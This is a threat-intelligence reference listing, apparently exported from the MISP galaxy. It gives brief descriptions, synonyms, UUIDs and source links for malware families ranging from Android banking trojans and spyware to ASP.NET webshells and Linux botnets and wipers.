TemptingCedar Spyware
Tempting cedar spyware is an Android spyware campaign, active since at least 2015, that used social engineering via fake, attractive Facebook profiles to trick victims into downloading malware. The spyware was designed to steal a wide range of sensitive personal data.
Internal MISP references
UUID 982c3554-1df2-4062-8f32-f311940ad9ff which can be used as unique global reference for TemptingCedar Spyware in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TgToxic
According to Trend Micro, TgToxic has been used in an ongoing campaign that has been targeting Android users in Southeast Asia since July 2022. The goal of the campaign is to steal victims' assets from finance and banking applications (such as cryptocurrency wallets, credentials for official mobile bank apps, and money on deposit) via a banking trojan they named TgToxic (based on its special encrypted filename), embedded in multiple fake apps. While it previously targeted users in Taiwan, Trend Micro observed the fraudulent activities and phishing lures targeting users from Thailand and Indonesia as of this writing. Users are advised to be wary of opening embedded links from unknown email and message senders, and to avoid downloading apps from third-party platforms.
Internal MISP references
UUID 06e9c140-c0de-4abe-97c3-4b0e985114bd which can be used as unique global reference for TgToxic in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.tgtoxic - webarchive
- https://www.trendmicro.com/en_us/research/23/b/tgtoxic-malware-targets-southeast-asia-android-users.html - webarchive
- https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study - webarchive
- https://intel471.com/blog/android-trojan-tgtoxic-updates-its-capabilities - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ThiefBot
Internal MISP references
UUID 5863d2eb-920d-4263-8c4b-7a16d410ff89 which can be used as unique global reference for ThiefBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TianySpy
According to Trend Micro, this malware appears to have been designed to steal credentials associated with membership websites of major Japanese telecommunication services.
Internal MISP references
UUID 8260dda5-f608-48f2-9341-28dbc5a8e895 which can be used as unique global reference for TianySpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TinyZ
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyZ.
| Known Synonyms |
|---|
| Catelites Android Bot |
| MarsElite Android Bot |
Internal MISP references
UUID 93b27a50-f9b7-4ab6-bb9f-70a4b914eec3 which can be used as unique global reference for TinyZ in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Titan
Internal MISP references
UUID 7d418da3-d9d2-4005-8cc7-7677d1b11327 which can be used as unique global reference for Titan in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ToxicPanda
ToxicPanda is an Android banking RAT first identified by Cleafy in October 2024. It shows similarity to the TgToxic campaign, but appears to be a new development rather than a derivative. The threat actors are likely Chinese speakers. ToxicPanda initially made use of hardcoded C2 domains only, but started to incorporate a DGA in late 2024.
Internal MISP references
UUID 7ac4865d-dc9d-468e-a462-67dfc63d118b which can be used as unique global reference for ToxicPanda in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Triada
Triada is a remote access trojan (RAT) malware that is used to compromise Android devices in order to steal confidential and sensitive information such as credit card numbers, passwords, bank account information, etc. It also provides a backdoor for attackers to include the device as part of a botnet and perform other malicious activities.
Internal MISP references
UUID fa5fdfd2-8142-43f5-9b48-d1033b5398c8 which can be used as unique global reference for Triada in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada - webarchive
- https://securelist.com/apkpure-android-app-store-infected/101845/ - webarchive
- https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/ - webarchive
- https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/ - webarchive
- http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
- https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/ - webarchive
- https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/ - webarchive
- https://securelist.com/triada-trojan-in-whatsapp-mod/103679/ - webarchive
- https://arstechnica.com/information-technology/2019/06/google-confirms-2017-supply-chain-attack-that-sneaked-backdoor-on-android-devices/ - webarchive
- https://security.googleblog.com/2019/06/pha-family-highlights-triada.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TrickMo
TrickMo is an advanced banking trojan for Android. Starting out as a companion malware to TrickBot in 2020, it first became a standalone banking trojan with the addition of overlay attacks in 2021 and was later (2024) upgraded with remote control capabilities for on-device fraud. The continued development and progressively improved obfuscation suggest an active threat actor.
Internal MISP references
UUID cff89ce1-a133-48a6-b8bd-e4f97cf23d6a which can be used as unique global reference for TrickMo in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.trickmo - webarchive
- https://cyble.com/blog/trickmos-return-banking-trojan-resurgence-with-new-features/ - webarchive
- https://www.zimperium.com/blog/expanding-the-investigation-deep-dive-into-latest-trickmo-samples/ - webarchive
- https://www.cleafy.com/cleafy-labs/a-new-trickmo-saga-from-banking-trojan-to-victims-data-leak - webarchive
- https://medium.com/@mvaks/analysis-of-malicious-mobile-applications-impersonating-popular-polish-apps-olx-allegro-iko-7dab879a320d - webarchive
- https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Triout
Bitdefender described Triout as an Android spyware which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware's surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recording videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.
Internal MISP references
UUID bd9ce51c-53f9-411b-b46a-aba036c433b1 which can be used as unique global reference for Triout in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TsarBot
According to Cyble, this is a banking trojan that targets over 750 applications globally, including banking, finance, cryptocurrency, and e-commerce apps. The malware spreads via phishing sites masquerading as legitimate financial platforms and is installed through a dropper disguised as Google Play Services. It uses overlay attacks to steal banking credentials, credit card details, and login credentials by displaying fake login pages over legitimate apps. TsarBot can record and remotely control the screen, executing fraud by simulating user actions such as swiping, tapping, and entering credentials while hiding malicious activities using a black overlay screen. It captures device lock credentials using a fake lock screen to gain full control. TsarBot communicates with its C&C server using WebSocket across multiple ports to receive commands, send stolen data, and dynamically execute on-device fraud.
Internal MISP references
UUID 58f59789-6677-403e-8af4-e7a8c7a4cb4b which can be used as unique global reference for TsarBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
UltimaSMS
Internal MISP references
UUID 65476d5f-321f-4385-867a-383094cadb58 which can be used as unique global reference for UltimaSMS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 001
Internal MISP references
UUID bbd5a32e-a080-4f16-98ea-ad8863507aa6 which can be used as unique global reference for Unidentified APK 001 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 002
Internal MISP references
UUID afb6a7cc-4185-4f19-8ad4-45dcbb76e544 which can be used as unique global reference for Unidentified APK 002 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 004
According to Check Point Research, this is a RAT that is disguised as a set of dating apps like "GrixyApp", "ZatuApp", "Catch&See", including dedicated websites to conceal their malicious purpose.
Internal MISP references
UUID 55626b63-4b9a-468e-92ae-4b09b303d0ed which can be used as unique global reference for Unidentified APK 004 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 005
Internal MISP references
UUID 5413ca94-1385-40c0-8eb2-1fc3aff87fb1 which can be used as unique global reference for Unidentified APK 005 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 006
Information stealer posing as a fake banking app, targeting Korean users.
Internal MISP references
UUID 2263198d-af38-4e38-a7a8-4435d29d88e8 which can be used as unique global reference for Unidentified APK 006 in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006 - webarchive
- https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20 - webarchive
- https://twitter.com/ReBensk/status/1438027183490940931 - webarchive
- https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/ - webarchive
- https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified 007 (ARMAAN RAT)
According to Cyble, this is an Android application that pretends to be the legitimate application for the Army Mobile Aadhaar App Network (ARMAAN), intended to be used by Indian army personnel. The application was customized to include RAT functionality.
Internal MISP references
UUID 75c641c4-17df-43c4-9773-c27464c5d2ff which can be used as unique global reference for Unidentified 007 (ARMAAN RAT) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 008
Android malware distributed through fake shopping websites that target Malaysian users, aimed at stealing banking information.
Internal MISP references
UUID 2ffddca0-841c-4eb6-9983-ff38abb5d6d6 which can be used as unique global reference for Unidentified APK 008 in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified APK 009 (Chrome Recon)
According to Google, this is a Chrome reconnaissance payload.
Internal MISP references
UUID 6d3bcabe-6b3a-49c1-b1a9-2239ce06deae which can be used as unique global reference for Unidentified APK 009 (Chrome Recon) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
VajraSpy
Internal MISP references
UUID c328b30f-e076-47dc-8c93-4d20f62c72ab which can be used as unique global reference for VajraSpy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
vamp
Related to the Micropsia Windows malware and also sometimes named Micropsia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular vamp.
| Known Synonyms |
|---|
| android.micropsia |
Internal MISP references
UUID 1ad5b462-1b0d-4c2f-901d-ead6c9f227bc which can be used as unique global reference for vamp in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
VINETHORN
According to Mandiant, VINETHORN is an Android malware family capable of a wide range of backdoor functionality. It can steal system information, read SMS inboxes, send SMS messages, access contact lists and call histories, record audio and video, and track device location via GPS.
Internal MISP references
UUID 6da6dfb6-2c50-465c-9394-26695d72e8c7 which can be used as unique global reference for VINETHORN in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Viper RAT
Internal MISP references
UUID 3482f5fe-f129-4c77-ae98-76e25f6086b9 which can be used as unique global reference for Viper RAT in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat - webarchive
- https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf - webarchive
- https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/ - webarchive
- https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
vo1d
According to Xlab, this malware is used to compromise Android TVs and set-top boxes, and its corresponding botnet had more than 1 million nodes observed via sinkholing (Jan 2025).
Internal MISP references
UUID 7e068dd0-5fc4-4c46-8766-09258654934a which can be used as unique global reference for vo1d in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Vultur
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Vultur.
| Known Synonyms |
|---|
| Vulture |
Internal MISP references
UUID 49b1c344-ce13-48bf-9839-909ba57649c4 which can be used as unique global reference for Vultur in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.vultur - webarchive
- https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html - webarchive
- https://embeeresearch.io/infrastructure-tracking-locating-vultur-domains-with-passive-dns/ - webarchive
- https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud - webarchive
- https://blog.fox-it.com/2024/03/28/android-malware-vultur-expands-its-wingspan - webarchive
- https://twitter.com/icebre4ker/status/1485651238175846400 - webarchive
- https://www.threatfabric.com/blogs/vultur-v-for-vnc.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WireX
Internal MISP references
UUID 77f2254c-9886-4eed-a7c3-bbcef4a97d46 which can be used as unique global reference for WireX in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex - webarchive
- https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/ - webarchive
- https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/ - webarchive
- https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/ - webarchive
- https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WolfRAT
Internal MISP references
UUID 994c7bb3-ba40-41bb-89b3-f05996924b10 which can be used as unique global reference for WolfRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Wroba
According to Avira, this is a banking trojan targeting Japan.
Internal MISP references
UUID 40a5d526-ef9f-4ddf-a326-6f33dceeeebc which can be used as unique global reference for Wroba in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
WyrmSpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WyrmSpy.
| Known Synonyms |
|---|
| AndroidControl |
Internal MISP references
UUID 77f81373-bb3a-449d-82ff-b28fe31acef6 which can be used as unique global reference for WyrmSpy in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.wyrmspy - webarchive
- https://cryptax.medium.com/organizing-malware-analysis-with-colander-example-on-android-wyrmspy-1f3ec30ae33b - webarchive
- https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41 - webarchive
- https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Xbot
Internal MISP references
UUID 4cfa42a3-71d9-43e2-bf23-daa79f326387 which can be used as unique global reference for Xbot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot - webarchive
- https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Xenomorph
Xenomorph is an Android banking RAT developed by the Hadoken.Security actor.
Internal MISP references
UUID d202e42d-2c35-4c1c-90f1-644a8cae38f1 which can be used as unique global reference for Xenomorph in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph - webarchive
- https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html - webarchive
- https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html - webarchive
- https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html - webarchive
- https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0 - webarchive
- https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5 - webarchive
- https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
xHelper
xHelper is a very persistent malware that can reinstall itself after a factory reset. It downloads malicious apps and displays intrusive ads.
Internal MISP references
UUID f54dec1f-bec6-4f4a-a909-690d65e0f14b which can be used as unique global reference for xHelper in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
XploitSPY
Internal MISP references
UUID 57600f52-b55f-49c7-9c0c-de10b2d23370 which can be used as unique global reference for XploitSPY in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
XRat
Internal MISP references
UUID a8f167a8-30b9-4953-8eb6-247f0d046d32 which can be used as unique global reference for XRat in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
YellYouth
Internal MISP references
UUID a2dad59d-2355-415c-b4d6-62236d3de4c7 which can be used as unique global reference for YellYouth in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Zanubis
According to Cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.
Internal MISP references
UUID cebf13e5-dbfc-49d6-8715-e3b7687d386f which can be used as unique global reference for Zanubis in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Zen
Internal MISP references
UUID 46d6d102-fc38-46f7-afdc-689cafe13de5 which can be used as unique global reference for Zen in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ZooPark
Internal MISP references
UUID b1fc66de-fda7-4f0c-af00-751d334444b3 which can be used as unique global reference for ZooPark in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark - webarchive
- https://securelist.com/whos-who-in-the-zoo/85394 - webarchive
- https://securelist.com/whos-who-in-the-zoo/85394/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-juno - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Ztorg
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ztorg.
| Known Synonyms |
|---|
| Qysly |
Internal MISP references
UUID 9fbf97c0-d87a-47b0-a511-0147a58b5202 which can be used as unique global reference for Ztorg in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg - webarchive
- http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2 - webarchive
- https://securelist.com/ztorg-from-rooting-to-sms/78775/ - webarchive
- https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LocalOlive
According to Microsoft, this is a web shell, written in ASPX supporting C#, carrying sufficient yet rudimentary functionality to support the following secondary activities: uploading and downloading files, running shell commands, opening a port (default port is set to TCP 250).
Internal MISP references
UUID 96224956-2167-4c19-abc9-dd901043d485 which can be used as unique global reference for LocalOlive in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Nightrunner
WebShell.
Internal MISP references
UUID b0206aac-30ff-41ce-b7d4-1b94ab15e3b1 which can be used as unique global reference for Nightrunner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Tunna
WebShell.
Internal MISP references
UUID b057f462-dc32-4f7b-95e0-98a20a48f2b2 which can be used as unique global reference for Tunna in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
TwoFace
According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.
The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, upload, download and deletion of files, and the capability to manipulate MAC timestamps.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TwoFace.
| Known Synonyms |
|---|
| HighShell |
| HyperShell |
| Minion |
| SEASHARPEE |
Internal MISP references
UUID a98a04e5-1f86-44b8-91ff-dbe1534782ba which can be used as unique global reference for TwoFace in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface - webarchive
- https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/ - webarchive
- https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2021-1214.pdf - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf - webarchive
- https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/ - webarchive
- https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://www.youtube.com/watch?v=GjquFKa4afU - webarchive
- https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Unidentified ASP 001 (Webshell)
Internal MISP references
UUID d4318f40-a39a-4ce0-8d3c-246d9923d222 which can be used as unique global reference for Unidentified ASP 001 (Webshell) in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Abcbot
Abcbot is a modular Go-based botnet and malware that propagates via exploits and brute force attempts. The botnet was observed launching DDoS attacks, performing internet scans, and serving web pages. It is probably linked to the Xanthe-based clipjacking campaign.
Internal MISP references
UUID 8d17175b-4e9f-43a9-851d-898bb6696984 which can be used as unique global reference for Abcbot in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot - webarchive
- https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/ - webarchive
- https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/ - webarchive
- https://www.cadosecurity.com/the-continued-evolution-of-abcbot/ - webarchive
- https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Abyss Locker
Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Abyss Locker.
| Known Synonyms |
|---|
| elf.hellokitty |
Internal MISP references
UUID 302a96b1-73cb-4f70-a329-e68debd87bf8 which can be used as unique global reference for Abyss Locker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
ACBackdoor (ELF)
A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.
Internal MISP references
UUID cd2d7040-edc4-4985-b708-b206b08cc1fe which can be used as unique global reference for ACBackdoor (ELF) in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor - webarchive
- https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AcidPour
Internal MISP references
UUID 11981e96-be46-4ce9-8085-af7224591951 which can be used as unique global reference for AcidPour in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AcidRain
A MIPS ELF binary with wiper functionality used against Viasat KA-SAT modems.
Internal MISP references
UUID 6108aa3d-ea6e-47fd-9344-d333b07f5a56 which can be used as unique global reference for AcidRain in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.acidrain - webarchive
- https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html - webarchive
- https://www.techtimes.com/articles/273755/20220331/viasat-hit-russia-s-wiper-malware-called-acidrain-affecting-european.htm - webarchive
- https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/ - webarchive
- https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/ - webarchive
- https://www.trellix.com/blogs/research/pouring-acid-rain/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://cybersecuritynews.com/acidrain-wiper-malware/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AgeLocker
Internal MISP references
UUID 5d04aac3-fdf5-4922-9976-3a5a75e96e1a which can be used as unique global reference for AgeLocker in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://twitter.com/IntezerLabs/status/1326880812344676352 - webarchive
- https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AIRASHI
According to Xlab, this is a DDoS bot.
Internal MISP references
UUID 833056f7-9aae-4846-bc6c-e8a1b00c06b7 which can be used as unique global reference for AIRASHI in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.airashi - webarchive
- https://blog.apnic.net/2025/03/13/botnets-never-die/ - webarchive
- https://blog.xlab.qianxin.com/large-scale-botnet-airashi/ - webarchive
- https://krebsonsecurity.com/2025/05/krebsonsecurity-hit-with-near-record-6-3-tbps-ddos/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
AirDropBot
AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AirDropBot.
| Known Synonyms |
|---|
| CloudBot |
Internal MISP references
UUID e91fcb82-e788-44cb-be5d-73b9601b9533 which can be used as unique global reference for AirDropBot in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Aisuru
Honeypot-aware variant of Mirai.
Internal MISP references
UUID e288425b-40f0-441e-977f-5f1264ed61b6 which can be used as unique global reference for Aisuru in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru - webarchive
- https://blog.xlab.qianxin.com/large-scale-botnet-airashi/ - webarchive
- https://cybernews.com/security/steam-riot-gaming-services-hit-by-disruptions-ddos-suspected/ - webarchive
- https://cyberch.com/posts/aisuru-botnet-shifts-from-ddos-to-residential-proxies/ - webarchive
- https://krebsonsecurity.com/2025/05/krebsonsecurity-hit-with-near-record-6-3-tbps-ddos/ - webarchive
- https://blog.xlab.qianxin.com/super-large-scale-botnet-aisuru-en/ - webarchive
- https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/ - webarchive
- https://gist.github.com/heavyscientist/de6a7c14e68b5862734b94a3c10e574c - webarchive
- https://blog.apnic.net/2025/03/13/botnets-never-die/ - webarchive
- https://krebsonsecurity.com/2025/10/aisuru-botnet-shifts-from-ddos-to-residential-proxies/ - webarchive
